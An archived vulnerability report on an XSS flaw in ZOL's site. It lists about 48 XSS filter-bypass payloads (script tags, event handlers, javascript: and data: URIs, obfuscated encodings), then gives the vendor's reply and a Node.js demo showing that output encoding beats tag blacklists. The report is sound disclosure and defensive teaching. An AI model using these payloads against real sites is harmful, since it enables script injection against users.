WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader --------http://drop.zone.ci/
2013-09-16: Details reported to the vendor, awaiting vendor response
2013-09-16: Vendor confirmed; details visible to the vendor only
2013-09-26: Details disclosed to core white hats and relevant domain experts
2013-10-06: Details disclosed to regular white hats
2013-10-16: Details disclosed to intern white hats
2013-10-31: Details disclosed to the public
Insufficient filtering.
Insufficient filtering makes it possible to inject malicious XSS code by intercepting and modifying the request.
Because several XSS vectors were inserted and tested at the same time, I can't be sure whether there is no filtering at all or the regex was simply thrown off. Here I'm providing the vectors I normally use for XSS testing, so reviewers can reproduce the scenario easily; ZOL can also use them as a reference when fixing the vulnerability.
<script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>
<script>alert([!![]]+[])</script>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script>
<script>prompt(-[])</script>
<script firefox>alert(1)</script>
<SCRIPT>+alert("2")</SCRIPT>
<script>alert(/3/)</script>
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/4/)></script>
<script/src=data:text/javascript,alert(5)></script>
<script>alert(String.fromCharCode(49))</script>
<script>alert(/7/.source)</script>
<script>setTimeout('alert(8)',0)</script>
<button/onclick=alert(9) >KCF</button>
<form><button formaction=javascript:alert(10)>CLICKME
<a href=javascript:confirm(11)>asd</a>
<a onmouseover=(alert(12))>KCF</a>
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(13)>ClickMe
<svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(14)"><rect width="1000" height="1000" fill="white"/></a> </svg>
<p/onmouseover=javascript:alert(15); >KCF</p>
<img src=x onerror=alert(16)>
<img src ?itworksonchrome?\/onerror = alert(17)>
<img src=x onerror=window.open('http://18.com');>
<img/src/onerror=alert(19)>
<img src="x:kcf" onerror="alert(20)">
<body/onload=alert(21)>
<body onscroll=alert(22)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<body oninput=alert(23)><input autofocus>
<var onmouseover="prompt(24)">KCF</var>
<div/onmouseover='alert(25)'>X
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																26
%29></iframe>
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	29	%29></iframe>
<iframe SRC="http://0x.lv/xss.swf"></iframe>
<IFRAME SRC="javascript:alert(27);"></IFRAME>
<meta http-equiv="refresh" content="0;javascript:alert(28)"/>
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E">
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>
<marquee onstart="alert('31')"></marquee>
<isindex type=image src=1 onerror=alert(32)>
<isindex action=javascript:alert(33) type=image>
<input onfocus=javascript:alert(34) autofocus>
<input onblur=javascript:alert(35) autofocus><input autofocus>
<select onfocus=javascript:alert(36) autofocus>
<textarea onfocus=javascript:alert(37) autofocus>
<keygen onfocus=javascript:alert(38) autofocus>
<FRAMESET><FRAME SRC="javascript:alert(39);"></FRAMESET>
<frameset onload=alert(40)>
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCg0MSk8L3NjcmlwdD4="></embed>
<embed src=javascript:alert(42)>
<svg onload="javascript:alert(43)" xmlns="http://www.w3.org/2000/svg"></svg>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(44)"></g></svg>
<math href="javascript:javascript:alert(45)">CLICKME</math>
<video><source onerror="alert(46)">
<audio src=x onerror=alert(47)>
<video src=x onerror=alert(48)>
Thanks for your hard work.
Severity: Low
Vulnerability Rank: 5
Confirmed: 2013-09-16 11:07
I'll go and talk to the person in charge. We discussed this issue with them before; it isn't possible to completely block every tag. Thanks for the submission.
None
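The vendor's reply frames the fix as "blocking tags", which is exactly what the vector list above is built to defeat. The following is an added example, not code from the WooYun report or from ZOL: a stand-alone Node.js script that runs a subset of the report's vectors through a hypothetical regex blacklist of the kind such a reply implies, and through plain HTML body encoding, then reports which vectors still look executable. The `VECTORS` subset is copied from the list above; `blacklistFilter()`, `encodeForHtmlBody()` and the `looksExecutable()` oracle are constructed for this demo and say nothing about ZOL's actual filter.

```javascript
// Added example (not from the WooYun report or ZOL): a tag/handler blacklist
// versus output encoding, run over a subset of the vectors listed above.
// Node.js, no dependencies. Run: node xss_filter_demo.js

// Subset of the report's vectors (copied from the list above).
const VECTORS = [
  '<script>alert(1)</script>',
  '<SCRIPT>+alert("2")</SCRIPT>',
  '<script/src=data:text/javascript,alert(5)></script>',
  '<img src=x onerror=alert(16)>',
  '<img/src/onerror=alert(19)>',
  '<svg onload="javascript:alert(43)" xmlns="http://www.w3.org/2000/svg"></svg>',
  '<a href=javascript:confirm(11)>asd</a>',
  '<input onfocus=javascript:alert(34) autofocus>',
  '<meta http-equiv="refresh" content="0;javascript:alert(28)"/>',
  '<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>',
];

// Hypothetical blacklist of the kind written when asked to "block the tags":
// strip <script>...</script>, strip whitespace-preceded on*= handlers, strip
// the javascript: scheme. Constructed for the demo; ZOL's real filter is unknown.
function blacklistFilter(input) {
  return input
    .replace(/<script>.*?<\/script>/g, '')                // exact, case-sensitive "<script>" only
    .replace(/\s+on\w+\s*=\s*["']?[^"'\s>]*["']?/g, '')  // only handlers preceded by whitespace
    .replace(/javascript:/g, '');                         // the scheme, literal spelling only
}

// Context-correct alternative: encode the five HTML-significant characters so
// the data can never open a tag. This is the encoder for HTML body text;
// attribute, URL and JavaScript contexts each need their own encoder.
function encodeForHtmlBody(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Crude oracle for the demo, not a sanitizer: a handler or script URL only
// executes from inside a tag, so inspect each tag's text separately.
// Case-insensitive, and treats "/" as an attribute separator like browsers do.
function looksExecutable(html) {
  const tags = html.match(/<[^>]*>?/g) || [];
  return tags.some((t) =>
    /^<script[\s\/>]/i.test(t) ||
    /[\s\/"']on\w+\s*=/i.test(t) ||
    /javascript:/i.test(t) ||
    /data:text\/html/i.test(t));
}

// Run every vector through both defences and return what still looks live.
function evaluate(vectors = VECTORS) {
  return {
    bypassedBlacklist: vectors.filter((v) => looksExecutable(blacklistFilter(v))),
    bypassedEncoding: vectors.filter((v) => looksExecutable(encodeForHtmlBody(v))),
  };
}

function report() {
  const { bypassedBlacklist, bypassedEncoding } = evaluate();
  console.log(`blacklist: ${bypassedBlacklist.length}/${VECTORS.length} vectors still executable`);
  for (const v of bypassedBlacklist) console.log('  survives as:', blacklistFilter(v));
  console.log(`encoding:  ${bypassedEncoding.length}/${VECTORS.length} vectors still executable`);
}

report();
```

Four of the ten vectors survive the blacklist for four different reasons: an upper-case `<SCRIPT>`, a `<script/src=...>` with no space before the attribute, a `/`-separated `onerror` handler, and a `data:` URI that contains no blacklisted word at all. None survive encoding, because once `<` becomes `&lt;` no tag can be opened, which is why "blocking every tag" is not a requirement for the fix: encode untrusted data for the context it lands in, and where rich HTML genuinely has to be accepted, parse it and allowlist elements and attributes rather than pattern-match for the bad ones.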